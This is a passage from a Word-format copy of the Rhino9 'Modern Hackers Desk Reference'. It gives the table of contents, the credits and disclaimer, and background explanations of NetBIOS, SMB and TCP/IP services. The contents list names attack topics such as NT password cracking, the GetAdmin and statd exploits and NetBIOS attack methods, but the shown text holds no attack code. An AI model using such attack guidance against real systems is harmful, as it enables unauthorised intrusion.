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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>The MH DeskRefere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ersion 1.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ritten/Assembled b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hino9 Te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ble of Cont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rt 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ssential background Knowled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0] Prefa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1] The Rhino9 Te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2] Disclaim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3] Thanks and Gree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 Preface To NetBIO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1] What is NetBIO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2] NetBIOS Na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3] NetBIOS Sess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4] NetBIOS Datagra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5] NetBEUI Expl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6] NetBIOS Scop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0] Preface to SMB'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1] What are SMB'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2] The Redirec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0] What is TCP/I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1] FTP Expl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2] Remote Log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3] Computer Ma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4] Network File Syste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5] Remote Prin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6] Remote Execu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7] Name Serv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8] Terminal Serv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9] Network-Oriented Window Syste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0] General description of the TCP/IP protoco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1] The TCP Leve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2] The IP leve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3] The Ethernet leve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4] Well-Known Sockets And The Applications Lay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5] Other IP Protoco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6] Domain Name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7] Rou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8] Subnets and Broadcas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9] Datagram Fragmentation and Reassemb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2.0] Ethernet encapsulation: AR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0.0] Preface to the WindowsNT Regi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0.1] What is the Regi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0.2] In Depth Key Discu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0.3] Understanding Hiv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0.4] Default Registry Setting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0] Introduction to PPT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1] PPTP and Virtual Private Network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2] Standard PPTP Deploy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3] PPTP Cli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4] PPTP Architec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5] Understanding PPTP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6] PPTP and the Regi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7] Special Security Upd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0] TCP/IP Commands as Too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1] The Arp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2] The Traceroute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3] The Netstat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4] The Finger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5] The Ping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6] The Nbtstat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7] The IpConfig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8] The Telnet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0] NT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1] The Logon Pro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2] Security Architecture Compon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3] Introduction to Securing an NT Bo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4] Physical Security Consider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5] Backu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6] Networks and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7] Restricting the Boot Pro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8] Security Steps for an NT Operating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9] Install Latest Service Pack and applicable hot-fix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0] Display a Legal Notice Before Log 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1] Rename Administrative Accou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2] Disable Guest Accou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3] Logging Off or Locking the Workst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4] Allowing Only Logged-On Users to Shut Down the Compu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5] Hiding the Last User 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6] Restricting Anonymous network access to Regi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7] Restricting Anonymous network access to lookup account names and network shar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8] Enforcing strong user passwo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9] Disabling LanManager Password Hash Suppo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0] Wiping the System Page File during clean system shutdow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1] Protecting the Regi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2] Secure EventLog View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3] Secure Print Driver Install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4] The Schedule Service (AT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5] Secure File Shar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6] Audi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7] Threat</w:t>
        <w:tab/>
        <w:t>Action</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8] Enabling System Audi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9] Auditing Base Objec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0] Auditing of Privileg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1] Protecting Files and Directo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2] Services and NetBios Access From Inter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6.3.3] Alerter and Messenger Servic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6.3.4] Unbind Unnecessary Services from Your Internet Adapter Ca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5] Enhanced Protection for Security Accounts Manager Databa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6] Disable Caching of Logon Credentials during interactive log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7] How to secure the %systemroot%\repair\sam._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8] TCP/IP Security in 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6.3.9] Well known TCP/UDP Port numbe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0] Preface to Microsoft Proxy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1] What is Microsoft Proxy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2] Proxy Servers Security Featur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3] Beneficial Features of Prox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4] Hardware and Software Requirem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5] What is the L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6] What is the LAT used f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7] What changes are made when Proxy Server is install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8] Proxy Server Architec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9] Proxy Server Services: An Introdu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0] Understanding compon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1] ISAPI Fil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2] ISAPI Applic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3] Proxy Servers Caching Mechanis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4] Windows Socke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5] Access Control Using Proxy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6] Controlling Access by Internet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7] Controlling Access by IP, Subnet, or Do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8] Controlling Access by Po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9] Controlling Access by Packet Typ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0] Logging and Event Aler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1] Encryption Issu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2] Other Benefits of Proxy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3] RA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4] IPX/SP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5] Firewall Strateg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6] Logical Constru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7] Exploring Firewall Typ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3] NT Security Twigs and E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rt Tw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Techniques of Surviv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0] NetBIOS Attack Metho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1] Comparing NAT.EXE to Microsoft's own executab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2] First, a look at NBTST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3] Intro to the NET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4] Net Accou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5] Net Compu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6] Net Config Server or Net Config Workst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7] Net Contin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8] Net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9] Net Gro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0] Net Hel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1] Net Helpmsg mess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2] Net Localgro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3] Net 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4] Net Pau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5] Net Pri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6] Net Se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7] Net Se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8] Net Sh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9] Net Statistics Server or Workst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2.0] Net Sto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2.1] Net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2.2] Net U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2.3] Net U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2.4] Net Vie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2.5] Special note on DOS and older Windows Mach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2.6] Actual NET VIEW and NET USE Screen Captures during a h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0.0] Frontpage Extension Attac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0.1] For the tech geeks, we give you an actual PWDUM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0.2] The haccess.ctl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0.3] Side note on using John the Ripp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0] WinG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1] What Is WinG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2] Defaults After a WinGate Inst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3] Port 23 Telnet Prox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4] Port 1080  SOCKS Prox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5] Port 6667  IRC Prox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6] How Do I Find and Use a WinG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7] I have found a WinGate telnet proxy now w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8] Securing the Proxy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9] mIRC 5.x WinGate Detection Scrip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1.0] Conclu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0.0] What a security person should know about Win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1.0.1] NT Network structures (Standalone/WorkGroups/Domain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0.2] How does the authentication of a user actually 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1.0.3] A word on NT Challenge and Respons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0.4] Default NT user grou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0.5] Default directory permiss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0.6] Common NT accounts and passwo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0.7] How do I get the admin account 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0.8] Accessing the password file in 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0.9] Cracking the NT passwo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0] What is 'last login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1] Ive got Guest access, can I try for Adm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2] I heard that the %systemroot%\system32 was write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3] What about spoofin DNS against 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4] What about default shared fold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5] How do I get around a packet filter-based firew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6] What is NTF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7] Are there are vulnerabilities to NTFS and access contro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8] How is file and directory security enforc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9] Once in, how can I do all that GUI stuf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2.0] How do I bypass the screen sa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2.1] How can tell if its an NT bo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2.2] What exactly does the NetBios Auditing Tool d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0.0] Cisco Routers and their configur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0.1] User Interface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0.2] disab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0.3] edit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0.4] enab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0.5] e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0.6] ex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0.7] full-hel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0.8] hel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0.9] histo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0] ip http access-cla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1] ip http por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2] ip http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3] menu (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4] menu (globa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5] menu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6] menu tex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7] menu tit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8] show histo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9] terminal edit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0] terminal full-help (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1] terminal histo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2.2] Network Access Security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3] aaa authentication ara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4] aaa authentication enable defaul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5] aaa authentication local-overri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6] aaa authentication logi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7] aaa authentication nasi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8] aaa authentication password-promp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9] aaa authentication pp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0] aaa authentication username-promp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1] aaa authoriz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2] aaa authorization config-comma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3] aaa new-mod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4] ara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5] clear kerberos cre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6] enable last-resor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7] enable use-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8] ip radius source-interfa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9] ip tacacs source-interfa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0] kerberos clients mandato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1] kerberos credentials forwa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2] kerberos instance ma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3] kerberos local-real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4] kerberos preauth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5] kerberos real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6] kerberos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7] kerberos srvtab ent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8] kerberos srvtab remo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9] key config-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0] login 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1] nasi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2] pp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3] ppp chap host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4] ppp chap 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5] ppp pap sent-user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6] ppp use-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7] radius-server dead-ti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8] radius-server ho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9] radius-server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0] radius-server retransm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1] show kerberos cre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2] show privileg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3] tacacs-server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4] tacacs-server login-timeo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5] tacacs-server authentica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6] tacacs-server directed-reque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7] tacacs-server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8] tacacs-server last-resor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9] tacacs-server notif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7.0] tacacs-server optional-pass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7.1] tacacs-server retransm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7.2] tacacs-server timeo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7.3] Traffic Filter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7.4] access-enab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7.5] access-templa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7.6] clear access-templa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7.7] show ip account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7.8] Terminal Access Security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7.9] enable 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8.0] enable secr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8.1] ip ident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8.2] login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8.3] privilege level (globa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8.4] privilege level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8.5] service password-encryp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8.6] show privileg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8.7] user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8.8] A Word on Ascend Rout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0] Known NT/95/IE Ho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1] WINS port 8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2] WindowsNT and SNM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3] Frontpage98 and Uni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4] TCP/IP Flooding with Smur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5] SLMail Security Probl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6] IE 4.0 and DHTM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7] 2 NT Registry Ris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8] Wingate Proxy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9] O'Reilly Website uploader Ho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0] Exchange 5.0 Password Cach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1] Crashing NT using NTF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2] The GetAdmin Explo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3] Squid Proxy Server Ho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3.1.4] Internet Information Server DoS attac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5] Ping Of Death I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6] NT Server's DNS DoS Att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7] Index Server Exposes Sensitive Materi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8] The Out Of Band (OOB) Att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9] SMB Downgrade Att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0] RedButt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1] FrontPage WebBot Ho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2] IE and NTLM Authentic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3] Run Local Commands with I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4] IE can launch remote ap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5] Password Grabbing Troja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6] Reverting an ISAPI Scrip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7] Rollback.ex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8] Replacing System .dl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9] Renaming Executab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0] Viewing ASP Scrip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1] .BAT and .CMD Attac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2] IIS /..\.. Probl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3] Truncated Fi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4] SNA Ho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5] SYN Flood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6] Land Att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7] Teardro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8] Pentium Bu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0.0] VAX/VMS Makes a comeback (expired user explo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0.1] Step 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0.2] Step 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0.3] Step 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0.4] No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5.0.0] Linux security 10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0.1] Step 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0.2] Step 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0.3] Step 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0.4] Step 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0.5] Step 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0.6] Step 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0] Unix Techniques. New and Ol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1] ShowMount Techniq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2] DEFINI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3] COMPARISION TO THE MICROSOFT WINDOWD FILESHAR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4] SMBXPL.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5] Basic Unix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6] Special Chracters in Uni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7] File Permissions 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8] STATD EXPLOIT TECHNIQ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9] System Prob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1.0] Port scann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1.1] rusers and finger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1.2] Mental Hacking, once you know a user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7.0.0] Making a DDI from a Motorola Brick ph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8.0.0] Pager Programm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9.0.0] The E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rt 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eded Background Knowled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ones for you Kev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0] Prefa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book was written/compiled by The Rhino9 Team as a document for the modern hacker. We chose to call it the Modern Hackers Desk Reference because it mostly deals with Networking Technologies and Windows NT issues. Which, as everyone knows, is a must knowledge these days. Well, rhino9, as the premiere NT Security source, we have continually given to the security community freely. We continue this tradition now with this extremely useful book. This book covers WindowsNT security issues, Unix, Linux, Irix, Vax, Router configuration, Frontpage, Wingate and much much mo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1] The Rhino9 Te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t the time of release, the rhino9 team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onSurge  (neonsurge@hotmail.com) [Security/Technical Research/Senior Memb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ameleon  (chameleon@pemail.com) [Security/Software Developer/Senior Memb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cuum  (vacuum@technotronic.com) [Security/Software Research/Senior Memb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ute (banshee@evil-empire.com) [Security/Software Developer/Code Gur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dicate  (syndicate@pemail.com) [Security/HTML Operations/Senior Memb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090000  (090000@intercore.com.ar)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monBytez  (root@cybrids.org)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Jammer  (netjammer@x-treme.org)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2] Disclaim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text document is released FREE of charge to EVERYONE. The rhino9 team made NO profits from this text. This text is NOT meant for re-sale, or for trade for any other type of material or monetary possesions. This text is given freely to the Internet community. The authors of this text do not take responsibility for damages incurred during the practice of any of the information contained within this text docume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0.3] Thanks and Gree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tra special greetings and serious mad ass props to NeonSurge's fiance SisterMoon, and Chameleon's woman, Jayde. Special thanks to the people at ntsecurity.net. Special thanks to Simple Nomad for releasing the NT HACK FAQ which was used in the making of this document. Thanks to Cisco Systems for making such superior equipment. Thanks to the guy from Lucent Technologies, whose text file was used during one of the NT Security sections (if you see this, contact me so I can give you proper credit). Special props go out to Virtual of Cybrids for his information on CellPhones and Pagers. Special props to Phreak-0 for his Unix contributions.  Mad props to Hellmaster for the Vax info. Thanks to Rloxley and the rest of X-Treme for helping with the distribution and advertising of this document. Thanks to Merlin45 for being the marketing pimp that he is. Greetings to Cybrids, Intercore, X-Treme, L0pht, CodeZero (grins), 2600 Magazine (thanks for your vigilance on the Mitnick ca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 Preface to NetBIO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fore you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, than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1] Whats is NetBIO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BIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for acessing networking serv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BIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LA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offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for th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BIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN enviroment, computers are known on the system  by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail bel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C's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis.  Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a se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l communication in these enviroments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respective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BIOS is a very common protocol used in todays enviroments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks.  In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over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NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagr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2] NetBIOS Na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BIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application  also has a NetBIOS station name that is user defined or that NetBIOS derives by internal mea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etBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within  the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS 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en a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process i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Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the inform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 If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that 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 If no other client on the network objects to the name registration, the client will finish the registration pro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re are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that no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NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix  is used by Microsoft Networking software to indentify the functionality installed or the registered device or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QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed abo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llowing is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal form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ab/>
        <w:tab/>
        <w:t>Number</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Us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00</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Workstation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01</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Messenger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_MSBROWSE_&gt;</w:t>
        <w:tab/>
        <w:t>01</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Master Brow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03</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Messenger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06</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>RAS Server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1F</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>NetDDE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20</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>File Server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21</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>RAS Client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22</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Exchange Interchang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23</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange Sto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24</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange Direc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30</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Modem Sharing Server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31</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Modem Sharing Client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43</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Client Remote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44</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Admin Remote Control To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45</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Client Remote C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46</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>SMS Client Remote Transf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4C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>DEC Pathworks TCPIP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52</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>DEC Pathworks TCPIP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87</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange M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6A</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Exchange IM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BE</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Network Monitor Ag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BF</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Network Monitor Ap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username&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>03</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Messenger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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>00</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Domain 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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1B</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Domain Master Brow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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Domain Controll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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1D</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Master Brow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domain&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>1E</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Browser Service Elec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INet~Services&gt;</w:t>
        <w:tab/>
        <w:t>1C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Internet Information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IS~Computer_name&gt;</w:t>
        <w:tab/>
        <w:t>00</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Internet Information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2B]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Lotus Notes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RISMULTICAST</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>[2F]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Lotus No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RISNAMESERVER</w:t>
        <w:tab/>
        <w:t>[33]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>G</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Lotus No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te_$ND800ZA</w:t>
        <w:tab/>
        <w:t>[20]</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>U</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>DCA Irmalan Gateway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ique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name uniq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roup (G): A normal group; the single name may exist with many IP address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ultihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 2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net Group (I): This is a special configuration of the group name used to manage WinNT domain na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ain Name (D): New in NT 4.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a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT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btstat -A [ipadd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btstat -a [ho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3] NetBIOS Sess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NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner.  If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traff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4] NetBIOS Datagra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atagrams  can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discard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end_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discard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BIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are differ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work protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WI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5] NetBEUI Expl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BEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol.  NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol lay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6] NetBIOS Scop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NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name uniq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0] Preface to SMB'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reason I decided to write this section was because recently the rhino9 team has been giving speeches and lectures. The two questions we most frequently come across is "What is NetBIOS?" and "What are SMBs?". Well I hope I have already answered the NetBIOS question with the section above. This particular section is being written to better help people understand SMB'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1] What are SMB'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er Message Blocks are a type of "messaging protocol" that LAN Manager (and NT) clients and servers use to communicate with each other. SMB's are a higher level protocol that can be transported over NetBEUI, NetBIOS over IPX, and NetBIOS over TCP/IP (or NB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MBs are used by Windows 3.X, Win95, WintNT and OS/2. When it comes to security and the compromise of security on an NT network, the one thing to remember about SMBs is that it allows for remote access to shared directories, the registry, and other system services, making it a deadly protocol in the eyes of security conscience peo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MB protocol was originally developed by IBM, and then jointly developed by Microsoft and IBM. Network requests that are sent using SMB's are encoded as Network Control Blocks (NCB) data structures. The NCB data structures are encoded in SMB format for transmission across the network. SMB is used in many Microsoft and IBM networking softw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MS-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IBM PC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IBM LAN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MS LAN Manag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LAN Manager for Uni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DEC Pathwor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MS Windows for Workgrou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Ungermann-Bass Net/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NT Networks through support for LAN Manag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MB Messages can be categorized into four typ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ssion Control: Used to establish or discontinue Redirector connections with a remote network resource such as a directory or printer. (The redirector is explained bel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le: Used to access and manipulate file system resources on the remote compu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inter: Used by the Redirector to send print data to a remote printer or queue, and to obtain the status of remote print dev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ssage: Used by applications and system components to send unicast or broadcast messag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2] The Redirec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edirector is the component that enables a client computer to gain access to resources on another computer as if the remote resources were local to the client computer. The Redirector communicates with other computers using the protocol st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edirectors primary function is to format remote requests so that they can be understood by a remote station (such as a file server) and send them on their way through the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edirector uses the Server Message Block (SMB) structure as the standard vehicle for sending these requests. The SMB is also the vehicle by which stations return responses to Redirector reque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ach SMB contains a header consisting of the command code (which specifies the task that the redirector wants the remote station to perform) and several environment and parameter fields (which specify how the command should be carrie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addition to the header, the last field in the SMB may contain up to 64K of data to be sent to the remote st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0] What is TCP/I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CP/IP is a set of protocols developed to allow cooperating computers to share resources across a network. It was developed by a community of researchers centered around the ARPAnet (Advanced Research Projects Agency). Certainly the ARPAnet is the best-known TCP/IP network. However as of June, 87, at least 130 different vendors had products that support TCP/IP, and thousands of networks of all kinds use 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irst some basic definitions. The most accurate name for the set of protocols we are describing is the "Internet protocol suite". TCP and IP are two of the protocols in this suite. (They will be described below.) Because TCP and IP are the best known of the protocols, it has become common to use the term TCP/IP to refer to the whole famil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Internet is a collection of networks, including the Arpanet, NSFnet, regional networks such as NYsernet, local networks at a number of University and research institutions, and a number of military networks and a growing number of private corporation owned networks. The term "Internet" applies to this entire set of networks. The subset of them that is managed by the Department of Defense is referred to as the "DDN" (Defense Data Network). This includes some research-oriented networks, such as the Arpanet, as well as more strictly military ones. All of these networks are connected to each other. Users can send messages from any of them to any other, except where there are security or other policy restrictions on acc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fficially speaking, the Internet protocol documents are simply standards adopted by the Internet community for its own use. More recently, the Department of Defense issued a MILSPEC definition o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CP/IP. This was intended to be a more formal definition, appropriate for use in purchasing specifications. However most of the TCP/IP community continues to use the Internet standards. The MILSPEC version is intended to be consistent with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atever it is called, TCP/IP is a family of protocols. A few provide "low-level" functions needed for many applications. These include IP, TCP, and UDP. (These will be described in a bit more detail la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thers are protocols for doing specific tasks, e.g. transferring files between computers, sending mail, or finding out who is logged in on another computer. Initially TCP/IP was used mostly betwe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inicomputers or mainframes. These machines had their own disks, and generally were self-contained. Thus the most important "traditional" TCP/IP services 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1] File Transf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e file transfer protocol (FTP) allows a user on any compu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get files from another computer, or to send files to an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puter. Security is handled by requiring the user to specify a u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 and password for the other computer, or logging into a system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lows for Anonymous logins. Provisions are made f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andling file transfer between machines with different character s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d of line conventions, etc. This is not quite the same thing as mo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cent "network file system" or "NetBIOS" protocols, which will b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scribed below. Rather, FTP is a utility that you run any time yo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ant to access a file on another system. You use it to copy the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your own system. You then work with the local copy. (See RFC 95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or specifications for FT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0.2] Remote Logi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e network terminal protocol (TELNET) allows a user to log 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 any other computer on the network. You start a remote session b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pecifying a computer to connect to. From that time until you fini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ession, anything you type is sent to the other computer. No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at you are really still talking to your own computer. But the tel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gram effectively makes your computer invisible while it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unning. Every character you type is sent directly to the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 Generally, the connection to the remote computer behaves mu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ike a dialup connection. That is, the remote system will ask you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g in and give a password, in whatever manner it would normally ask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 who had just dialed it up. When you log off of the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puter, the telnet program exits, and you will find yourself talk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your own computer. Microcomputer implementations of tel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enerally include a terminal emulator for some common type o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rminal. (See RFC's 854 and 855 for specifications for telnet. By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ay, the telnet protocol should not be confused with Telenet, a vend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f commercial network serv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3] Computer Ma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is allows you to send messages to users on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puters. Originally, people tended to use only one or two specif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puters. They would maintain "mail files" on those machines.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puter mail system is simply a way for you to add a message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other user's mail file. There are some problems with this in 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vironment where microcomputers are used. The most serious is that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icro is not well suited to receive computer mail. When you send ma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mail software expects to be able to open a connection to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ressee's computer, in order to send the mail. If this is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icrocomputer, it may be turned off, or it may be running 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pplication other than the mail system. For this reason, mail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rmally handled by a larger system, where it is practical to have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il server running all the time. Microcomputer mail software th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comes a user interface that retrieves mail from the ma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er. (See RFC 821 and 822 for specifications for computer mail. S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FC 937 for a protocol designed for microcomputers to use in read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il from a mail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se services should be present in any implementation of TCP/IP, except that micro-oriented implementations may not support computer mail. These traditional applications still play a very important role in TCP/IP-based networks. However more recently, the way in which networks are used has been changing. The older model of a number of large, self-sufficient computers is beginning to change. Now many installations have several kinds of computers, including microcomputers, workstations, minicomputers, and mainframes. These computers are likely to be configured to perform specializ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sks. Although people are still likely to work with one specific computer, that computer will call on other systems on the net for specialized services. This has led to the "server/client" model of network services. A server is a system that provides a specific service for the rest of the network. A client is another system that uses that service. (Note that the server and client need not be on different computers. They could be different programs running on the same compu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re are the kinds of servers typically present in a modern computer setup. Note that these computer services can all be provided within the framework of TCP/I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4] Network File Syste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is allows a system to access files on another computer in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mewhat more closely integrated fashion than FTP. A network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 provides the illusion that disks or other devices from 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 are directly connected to other systems. There is no need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 a special network utility to access a file on another system. You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puter simply thinks it has some extra disk drives. These extr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irtual" drives refer to the other system's disks. This capability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ful for several different purposes. It lets you put large disks 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few computers, but still give others access to the disk space. Asi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om the obvious economic benefits, this allows people working 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veral computers to share common files. It makes system maintena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d backup easier, because you don't have to worry about updating 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acking up copies on lots of different machines. A number of vendo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 offer high-performance diskless computers. These computers have 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isk drives at all. They are entirely dependent upon disks 